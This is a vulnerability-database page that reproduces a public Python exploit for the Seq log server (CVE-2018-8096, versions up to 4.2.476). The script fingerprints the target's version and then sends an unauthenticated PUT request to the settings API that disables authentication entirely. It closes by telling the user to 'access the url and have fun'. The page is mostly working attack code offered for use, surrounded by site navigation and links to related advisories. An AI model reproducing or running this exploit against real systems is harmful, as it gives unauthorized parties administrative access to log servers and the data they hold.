Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDaniel ChactouraPACKETSTORM:148800
HistoryAug 02, 2018 - 12:00 a.m.

Seq 4.2.476 Authentication Bypass

2018-08-0200:00:00
Daniel Chactoura
packetstormsecurity.com
23

0.537 Medium

EPSS

Percentile

97.6%

JSON
`# Exploit Title: Seq 4.2.476 - Authentication Bypass  
# Date: 2018-08-02  
# Exploit Author: Daniel Chactoura  
# Vendor Homepage: https://getseq.net/  
# Software Link: https://getseq.net/Download/All  
# Version: <= 4.2.476  
# CVE : CVE-2018-8096  
# Post Reference: https://medium.com/stolabs/bypass-admin-authentication-on-seq-17f0f9e02732  
  
# coding=utf-8  
  
#!/bin/python  
  
import sys  
import requests  
  
def verifyArgs(args):  
if len(args) < 2:  
print('[!] Usage: '+str(args[0])+' https://target')  
exit(0)  
elif 'http' not in str(args[1]):  
print('''[!] Missing "https://" !''')  
exit(0)  
else:  
return(1)  
  
def verifyVersion(url):  
vulnVersions = ['4.2.476','4.2.470','4.1.17','4.1.16',  
'4.1.14','4.0.60','4.0.58','3.4.20',  
'3.4.18','3.4.17','3.3.23','3.3.22',  
'3.3.21','3.3.20','3.2.16','3.1.17',  
'3.1.16','3.0.30','2.4.2','2.3.4',  
'2.3.3','2.2.8','2.1.22','2.1.21',  
'2.0.19','1.6.13','1.6.12','1.6.11',  
'1.6.10','1.6.9','1.6.8','1.6.7',  
'1.6.6','1.6.5','1.6.4','1.5.19',  
'1.5.18','1.5.17','1.5.16','1.4.12',  
'1.4.11','1.4.10','1.4.9','1.4.8',  
'1.4.7','1.4.6','1.3.11','1.3.10',  
'1.3.9','1.3.8']  
u = str(url)  
verifV = requests.get(u+'/api/')  
verifVJSON = verifV.json()  
ver = str(verifVJSON['Version'])[:-2]  
  
if ver in vulnVersions:  
print("[+] Seq's version is potentially vulnerable!")  
return(1)  
else:  
print("[!] Seq's version is probably not vulnerable!")  
return(0)  
  
def bypassAuth(url):  
u = str(url)  
payload = "{'Name':'isauthenticationenabled','Value':false,'Id':'setting-isauthenticationenabled','Links':{'Self':'api/settings/setting-isauthenticationenabled','Group':'api/settings/resources'}}"  
h = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0', 'Referer':u}  
verifM = requests.put(u+'/api/settings/setting-isauthenticationenabled', data=payload, headers=h)  
verifMCode = str(verifM.status_code)  
if verifMCode == '200':  
print("[:)] YES! Success! Now, access the url and have fun!")  
else:  
print("[:(] DAMN! This is not your lucky day...")  
  
def main():  
try:  
if verifyArgs(sys.argv):  
if verifyVersion(sys.argv[1]):  
bypassAuth(sys.argv[1])  
else:  
c = input('[?] Do you want to try it anyway? (y/n): ').lower()  
if c == 'y':  
pass  
elif c == 'n':  
exit(0)  
else:  
print('[!] Invalid choice!')  
exit(0)  
except KeyboardInterrupt:  
exit(0)  
  
if __name__ == '__main__':  
main()  
  
`

Related

cve 1
exploitpack 1
prion 1
checkpoint_advisories 1
zdt 1
nvd 1
cvelist 1
exploitdb 1
cve
cve
CVE-2018-8096
2018-03-14 00:29:00
exploitpack
exploitpack
Seq 4.2.476 - Authentication Bypass
2018-08-02 00:00:00
prion
prion
Authentication flaw
2018-03-14 00:29:00
checkpoint_advisories
checkpoint_advisories
Datalust Seq Authentication Bypass (CVE-2018-8096)
2022-10-12 00:00:00
zdt
zdt
Seq 4.2.476 - Authentication Bypass Vulnerability
2018-08-03 00:00:00
nvd
nvd
CVE-2018-8096
2018-03-14 00:29:00
cvelist
cvelist
CVE-2018-8096
2018-03-14 00:00:00
exploitdb
exploitdb
Seq 4.2.476 - Authentication Bypass
2018-08-02 00:00:00

0.537 Medium

EPSS

Percentile

97.6%

JSON
Related for PACKETSTORM:148800
cve1exploitpack1prion1checkpoint_advisories1zdt1nvd1cvelist1exploitdb1